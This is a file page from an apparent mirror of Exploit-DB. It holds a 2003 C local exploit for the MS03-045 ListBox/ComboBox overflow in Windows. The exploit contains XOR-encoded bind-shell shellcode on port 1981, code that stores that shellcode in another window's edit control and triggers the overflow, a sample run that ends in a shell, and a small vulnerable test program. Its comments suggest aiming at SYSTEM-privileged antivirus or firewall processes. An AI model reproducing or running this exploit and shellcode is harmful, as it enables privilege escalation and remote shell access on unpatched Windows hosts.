bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/122.c
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

263 lines
No EOL
7.7 KiB
C
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

/*
\ local ListBox/ComboBox exploit for Win32
/
\ Created by xCrZx crazy_einstein yahoo com /11.11.03/
/
\ Usage: MS03-045.exe <-t target> [-r return address]
/
\ there is two targets: CB_DIR (for ComboBox), LB_DIR (for ListBox).
/
\ As to return address it should be such as 0x0000XXYY
/ (and you should know that this address will be transformed
\ into unicode! And if XX and YY bytes <128 it will maintained!
/ And return address will be such as 0x00XX00YY!
\ If not it will be coded in two bytes each of this bytes and
/ return will be looked like 0xZZZZWWWW)
\
/ To figure out handle addresses you can use tools such as
\ Spy++ (default tool contained in MSVC++ 6.0)
/
\ Note: there is no so easy exploitation of this stuff!
/ first of all you should figure out the handle
\ addresses of ListBox/ComboBox & EDIT,RichEdit,etc
/ (to store shellcode inside of it.. you can also
\ store shellcode by diffrent way into variables of
/ vuln program (i.e. through fopen(),argv,etc..)
\
/
\ yesh yesh y0...check it out y0...
/ wu-tang clan forever :)
\
/ greetzz to: tANDm :), Billi_k1d, alph4, btr, hhs, v1pee, ni69az,
\ akid, Joel Eriksson, andrewg, Amour and others...
/
\ tested on WinXP (also should work on others Win32)
/
\ p.s. use can find vuln program with SYSTEM privileges (antivirus,firewall,etc)
/ to obtain the SYSTEM privileges
\
*/
/*
\
/ example of work:
\ -----------------
/
\ vuln program:
/
\ C:\...ual Studio\MyProjects\vuln\Debug>vuln.exe
/
\
/ C:\...ual Studio\MyProjects\vuln\Debug>
\
/
\ -------
/
\ exploit:
/
\ C:\MSVCSTAFF\Debug>85boom.exe -t 0
/
\ [MS03-045 local exploit by xCrZx /11.11.03/]
/
\ Enter addresses of the program handles:
/ <handle of Edit/RichEdit/etc (to store shellcode)> <handle of ListBox/ComboBox>
\ (i.e. "00450ca1 0066345c") -> 1e01f6 2701a2
/
\ [+] Set shellcode!
/ --> Using LB_DIR command
\ --> Using return address = 0x1515
/ [+] Set return addresses!
\ [+] Sending shellcode message!
/ [+] Sending exploit message! Try to connect on 1981 port after 5 sec!
\
/
\ --------
/
\ Microsoft Telnet> open localhost 1981
/
\ ...
/
\ Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
/ () Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
\
/ C:\Program Files\Microsoft Visual Studio\MyProjects\vuln\Debug>
\
*/
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
char shellcode[] =
//bind on 1981
"\xEB\x0F\x5B\x80\x33\x93\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
"\x05\xE8\xEC\xFF\xFF\xFF"
//sc_bind_1981 for 2k/xp/2003 by ey4s
//speacial version for ws_ftp base on v1.03.10.07
//XOR with 0x93 (367 0x16F bytes)
"\x12\x7F\x93\x91\x93\x93\x7A\xA4\x92\x93\x93\xCC\xF7\x32\xA3\x93"
"\x93\x93\x18\xD3\x9F\x18\xE3\x8F\x3E\x18\xFB\x9B\xF9\x97\xCA\x7B"
"\x4A\x93\x93\x93\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC"
"\xC7\x6C\xC4\x6F\x18\x7B\xF9\x95\xCA\x7B\x2C\x93\x93\x93\x71\x6A"
"\x12\x7F\x03\x92\x93\x93\xC7\xFB\x91\x91\x93\x93\x6C\xC4\x7B\xC3"
"\xC3\xC3\xC3\xF9\x92\xF9\x91\x6C\xC4\x63\x18\x4B\x18\x7F\x54\xD6"
"\x93\x91\x93\x94\x2E\xA0\x53\x1A\xD6\x97\xF9\x83\xC6\xC0\x6C\xC4"
"\x67\xC0\xF9\x92\xC0\x6C\xC4\x6B\xC3\xC3\xC0\x6C\xC4\x6F\xC3\x10"
"\x7F\xCB\x18\x67\xA0\x48\xF9\x83\xCA\x1A\x8F\x1D\x71\x68\x78\xBF"
"\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3"
"\xD3\xD3\xD3\xD3\x03\x03\x03\x03\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3"
"\xE9\x35\xFF\xFF\xFF\xD3\xD3\xD3\xD3\xD3\xD3\xD3\x1A\xD5\xAB\x1A"
"\xD5\xAF\x1A\xD5\xD3\x54\xD5\xBF\x92\x92\x93\x93\x1E\xD5\xD7\xC3"
"\xC5\xC0\xC0\xC0\xF9\x92\xC0\xC0\x1E\xD5\xC7\x54\x93\xF0\xFE\xF7"
"\x93\xC3\xC0\x6C\xC4\x73\xA0\x53\xDB\xC3\x6C\xE5\xD7\x6C\xC4\x4F"
"\x10\x57\xCB\x6C\xC4\x7F\x6C\xC4\x7F\xC3\x6C\xC4\x4B\xC2\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\xA0\x41\x9C\x2D\x83\xA9\x45\xE7\x9B\x52"
"\x58\x88\x90\x49\xD3\x78\x7C\xA8\x8C\xE6\x76\xCD\x18\xCD\xB7\x90"
"\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38"
"\xCA\x50\x7B\x57\x6D\x6C\x6C\x7A\x28\x50\x3D\x27\xEE\x86\x0B\x58"
"\xD1\xE4\x2B\x4F\x4E\x89\xA0\xBE\x87\xC5\x3D\x55\xB8\x2E\xBD\x4D"
"\xC4\xE1\x37\xB7\x21\xA1\x93\x9D\xCE\x58\x4D\xE7\xB1\xF0\x5B"
//decode end sign
"\x45\x59\x34\x53";
#define SIZE 60000
int main(int argc, char **argv) {
HWND target=(HWND)0x240302;
HWND target2;
char buf[SIZE+5];
char b0000[30000];
long ret=0x00001515;
int trigger=0;
printf("\n[MS03-045 local exploit by xCrZx /11.11.03/]\n\n");
if(argc==1) {
printf( "Usage: %s <-t N> [-r return address]\n\n"
"N targets (-t option):\n\n\t0 - LB_DIR\n\t1 - CB_DIR\n\n"
,argv[0]);
exit(0);
}
for(int j=0;j<argc;j++) {
if(strcmp(argv[j],"-t")==NULL) { trigger = atoi(argv[j+1]); }
if(strcmp(argv[j],"-r")==NULL) { ret = strtoul(argv[j+1],0,16); }
}
printf("Enter addresses of the program handles:\n<handle of Edit/RichEdit/etc (to store shellcode)>
<handle of ListBox/ComboBox>\n(i.e. \"00450ca1 0066345c\") -> ");fflush(stdout);
scanf("%x %x",&target2,&target);
memset(buf,0x00,sizeof buf);
memset(b0000,0x00,sizeof b0000);
printf("\n[+] Set shellcode!\n");
memset(b0000,0x90,sizeof(b0000)-strlen(shellcode)-1);
memcpy(b0000+strlen(b0000),&shellcode,strlen(shellcode));
printf("--> Using %s command\n",(trigger)?("CB_DIR"):("LB_DIR"));
printf("--> Using return address = 0x%x\n",ret);
printf("[+] Set return addresses!\n");
for(int i=0;i<SIZE/4;i++)
*(long *)&buf[strlen(buf)]=ret;
printf("[+] Sending shellcode message!\n");
SendMessage(target2,WM_SETTEXT,0,(LPARAM)b0000);
printf("[+] Sending exploit message! Try to connect on 1981 port after 5 sec!\n");
SendMessage(target , (trigger)?(CB_DIR):(LB_DIR) ,
DDL_READWRITE | DDL_DIRECTORY | DDL_DRIVES ,
(LPARAM)buf
);
return 0;
}
------------------------------------------------------------------------------------------------------------
// zzz.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <windows.h>
LRESULT CALLBACK WndProc(HWND hwnd , UINT msg , WPARAM wp , LPARAM lp) {
static HWND list;
static HWND rich;
switch (msg) {
case WM_DESTROY:
PostQuitMessage(0);
return 0;
case WM_CREATE:
list = CreateWindow(
TEXT("LISTBOX") , NULL ,
WS_CHILD | WS_VISIBLE | LBS_STANDARD ,
0 , 0 , 300 , 300 , hwnd , (HMENU)1 ,
((LPCREATESTRUCT)(lp))->hInstance , NULL
);
rich = CreateWindow("EDIT", // predefined class
NULL, // no window title
WS_CHILD | WS_VISIBLE | WS_VSCROLL |
ES_LEFT | ES_MULTILINE | ES_AUTOVSCROLL,
300, 300, 100, 100, // set size in WM_SIZE message
hwnd, // parent window
(HMENU) 1, // edit control ID
(HINSTANCE) GetWindowLong(hwnd, GWL_HINSTANCE),
NULL);
return 0;
}
return DefWindowProc(hwnd , msg , wp , lp);
}
int WINAPI WinMain(HINSTANCE hInstance , HINSTANCE hPrevInstance ,
PSTR lpCmdLine , int nCmdShow ) {
HWND hwnd;
MSG msg;
WNDCLASS winc;
winc.style = CS_HREDRAW | CS_VREDRAW;
winc.lpfnWndProc = WndProc;
winc.cbClsExtra = winc.cbWndExtra = 0;
winc.hInstance = hInstance;
winc.hIcon = LoadIcon(NULL , IDI_APPLICATION);
winc.hCursor = LoadCursor(NULL , IDC_ARROW);
winc.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH);
winc.lpszMenuName = NULL;
winc.lpszClassName = TEXT("KITTY");
if (!RegisterClass(&winc)) return -1;
hwnd = CreateWindow(
TEXT("KITTY") , TEXT("Kitty on your lap") ,
WS_OVERLAPPEDWINDOW | WS_VISIBLE ,
CW_USEDEFAULT , CW_USEDEFAULT ,
CW_USEDEFAULT , CW_USEDEFAULT ,
NULL , NULL , hInstance , NULL
);
if (hwnd == NULL) return -1;
while(GetMessage(&msg , NULL , 0 , 0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
// milw0rm.com [2003-11-14]
Reference in a new issue View git blame Copy permalink